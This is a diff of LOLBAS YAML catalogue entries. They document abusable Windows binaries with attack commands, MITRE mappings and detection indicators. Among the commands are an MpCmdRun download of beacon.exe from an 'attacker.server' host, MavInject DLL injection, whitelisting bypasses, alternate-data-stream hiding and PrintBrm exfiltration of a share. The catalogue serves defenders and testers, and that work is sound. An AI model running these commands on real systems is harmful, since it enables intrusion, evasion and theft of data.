@ -39,4 +39,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Jsc.exe
|
||||
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-05-31'
|
||||
Created: 2019-05-31
|
||||
Commands:
|
||||
- Command: jsc.exe scriptfile.js
|
||||
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
||||
@ -25,14 +25,14 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
||||
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
||||
Resources:
|
||||
- Link: https://twitter.com/DissectMalware/status/998797808907046913
|
||||
- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
|
||||
Acknowledgement:
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Makecab.exe
|
||||
Description: Binary to package existing files into a cabinet (.cab) file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
@ -31,7 +31,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\makecab.exe
|
||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Makecab getting files from Internet
|
||||
@ -41,4 +41,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mavinject.exe
|
||||
Description: Used by App-v in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||
Description: Inject evil.dll into a process with PID 3110.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mavinject.exe
|
||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@gN3mes1s'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Microsoft.Workflow.Compiler.exe
|
||||
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
||||
Author: 'Conor Richard'
|
||||
Created: '2018-10-22'
|
||||
Created: 2018-10-22
|
||||
Commands:
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||
@ -19,7 +19,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||
Usecase: Compile and run code
|
||||
@ -27,10 +27,10 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||
@ -53,4 +53,4 @@ Acknowledgement:
|
||||
Handle: '@FortyNorthSec'
|
||||
- Person: Bank Security
|
||||
Handle: '@Bank_Security'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mmc.exe
|
||||
Description: Load snap-ins to locally and remotely manage Windows systems
|
||||
Author: '@bohops'
|
||||
Created: '2018-12-04'
|
||||
Created: 2018-12-04
|
||||
Commands:
|
||||
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
||||
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
||||
@ -15,10 +15,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||
Acknowledgement:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: MpCmdRun.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '09/03/2020'
|
||||
Created: 2020-03-20
|
||||
Commands:
|
||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
||||
@ -32,9 +32,9 @@ Full_Path:
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: MpCmdRun storing data into alternate data streams.
|
||||
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
||||
@ -54,4 +54,4 @@ Acknowledgement:
|
||||
Handle: ''
|
||||
- Person: Cedric
|
||||
Handle: '@th3c3dr1c'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Msbuild.exe
|
||||
Name: Msbuild.exe
|
||||
Description: Used to compile and execute code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
@ -37,7 +37,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
Resources:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msconfig.exe
|
||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Msconfig.exe -5
|
||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msconfig.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||
Detection:
|
||||
- IOC: mscfgtlc.xml changes in system32 folder
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Msdt.exe
|
||||
Description: Microsoft diagnostics tool
|
||||
Description: Microsoft diagnostics tool
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
@ -23,15 +23,15 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Msdt.exe
|
||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- Link: https://twitter.com/harr0ey/status/991338229952598016
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mshta.exe
|
||||
Description: Used by Windows to execute html applications. (.hta)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: mshta.exe evilfile.hta
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mshta.exe
|
||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||
Detection:
|
||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||
@ -48,10 +48,10 @@ Resources:
|
||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msiexec.exe
|
||||
Description: Used by Windows to execute msi files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msiexec /quiet /i cmd.msi
|
||||
Description: Installs the target .MSI file silently.
|
||||
@ -35,11 +35,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: msiexec.exe getting files from Internet
|
||||
@ -51,4 +51,4 @@ Acknowledgement:
|
||||
Handle: '@netbiosX'
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Netsh.exe
|
||||
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-12-24'
|
||||
Created: 2019-12-24
|
||||
Commands:
|
||||
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Netsh initiating a network connection
|
||||
@ -32,4 +32,4 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Odbcconf.exe
|
||||
Description: Used in Windows for managing ODBC connections
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: odbcconf -f file.rsp
|
||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\odbcconf.exe
|
||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
---
|
||||
|
22
yml/OSBinaries/OfflineScannerShell.yml
Normal file
22
yml/OSBinaries/OfflineScannerShell.yml
Normal file
@ -0,0 +1,22 @@
|
||||
---
|
||||
Name: OfflineScannerShell.exe
|
||||
Description: Windows Defender Offline Shell
|
||||
Author: 'Elliot Killick'
|
||||
Created: '2021-08-16'
|
||||
Commands:
|
||||
- Command: OfflineScannerShell
|
||||
Description: Execute mpclient.dll library in the current working directory
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
|
||||
Detection:
|
||||
- IOC: OfflineScannerShell.exe should not be run on a normal workstation
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
25
yml/OSBinaries/OneDriveStandaloneUpdater.yml
Normal file
25
yml/OSBinaries/OneDriveStandaloneUpdater.yml
Normal file
@ -0,0 +1,25 @@
|
||||
---
|
||||
Name: OneDriveStandaloneUpdater.exe
|
||||
Description: OneDrive Standalone Updater
|
||||
Author: 'Elliot Killick'
|
||||
Created: '2021-08-22'
|
||||
Commands:
|
||||
- Command: OneDriveStandaloneUpdater
|
||||
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
|
||||
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
|
||||
Detection:
|
||||
- IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
|
||||
- IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
|
||||
Resources:
|
||||
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/153
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
@ -2,7 +2,7 @@
|
||||
Name: Pcalua.exe
|
||||
Description: Program Compatibility Assistant
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: pcalua.exe -a calc.exe
|
||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -41,4 +41,4 @@ Acknowledgement:
|
||||
Handle: '@kylehanslovan'
|
||||
- Person: Fab
|
||||
Handle: '@0rbz_'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pcwrun.exe
|
||||
Description: Program Compatibility Wizard
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcwrun.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -23,4 +23,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pktmon.exe
|
||||
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||
Author: 'Derek Johnson'
|
||||
Created: '2020-08-12'
|
||||
Created: 2020-08-12
|
||||
Commands:
|
||||
- Command: pktmon.exe start --etw
|
||||
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||
@ -23,9 +23,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\pktmon.exe
|
||||
- Path: c:\windows\syswow64\pktmon.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: .etl files found on system
|
||||
Resources:
|
||||
- Link: https://binar-x79.com/windows-10-secret-sniffer/
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Presentationhost.exe
|
||||
Description: File is used for executing Browser applications
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||
Description: Executes the target XAML Browser Application (XBAP) file
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Presentationhost.exe
|
||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Print.exe
|
||||
Description: Used by Windows to send files to the printer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
@ -31,7 +31,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\print.exe
|
||||
- Path: C:\Windows\SysWOW64\print.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Print.exe getting files from internet
|
||||
@ -42,4 +42,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
32
yml/OSBinaries/PrintBrm.yml
Normal file
32
yml/OSBinaries/PrintBrm.yml
Normal file
@ -0,0 +1,32 @@
|
||||
---
|
||||
Name: PrintBrm.exe
|
||||
Description: Printer Migration Command-Line Tool
|
||||
Author: 'Elliot Killick'
|
||||
Created: '2021-06-21'
|
||||
Commands:
|
||||
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
|
||||
Description: Create a ZIP file from a folder in a remote drive
|
||||
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
||||
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
||||
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/techniques/T1096/
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
|
||||
Detection:
|
||||
- IOC: PrintBrm.exe should not be run on a normal workstation
|
||||
Resources:
|
||||
- Link: https://twitter.com/elliotkillick/status/1404117015447670800
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
@ -2,7 +2,7 @@
|
||||
Name: Psr.exe
|
||||
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||
Author: Leon Rodenko
|
||||
Created: '2020-06-27'
|
||||
Created: 2020-06-27
|
||||
Commands:
|
||||
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||
@ -15,9 +15,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\psr.exe
|
||||
- Path: c:\windows\syswow64\psr.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: psr.exe spawned
|
||||
- IOC: suspicious activity when running with "/gui 0" flag
|
||||
Resources:
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Rasautou.exe
|
||||
Description: Windows Remote Access Dialer
|
||||
Author: 'Tony Lambert'
|
||||
Created: '2020-01-10'
|
||||
Created: 2020-01-10
|
||||
Commands:
|
||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||
Usecase: Execute DLL code
|
||||
Category: Execute
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rasautou.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: rasautou.exe command line containing -d and -p
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: FireEye
|
||||
Handle: '@FireEye'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Reg.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\reg.exe
|
||||
- Path: C:\Windows\SysWOW64\reg.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: reg.exe writing to an ADS
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Regasm.exe
|
||||
Description: Part of .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: Execute
|
||||
@ -25,7 +25,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regasm.exe executing dll file
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regedit.exe
|
||||
Description: Used by Windows to manipulate registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||
Description: Export the target Registry key to the specified .REG file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regedit.exe
|
||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regedit.exe reading and writing to alternate data stream
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regini.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2020-07-03'
|
||||
Created: 2020-07-03
|
||||
Commands:
|
||||
- Command: regini.exe newfile.txt:hidden.ini
|
||||
Description: Write registry keys from data inside the Alternate data stream.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regini.exe
|
||||
- Path: C:\Windows\SysWOW64\regini.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regini.exe reading from ADS
|
||||
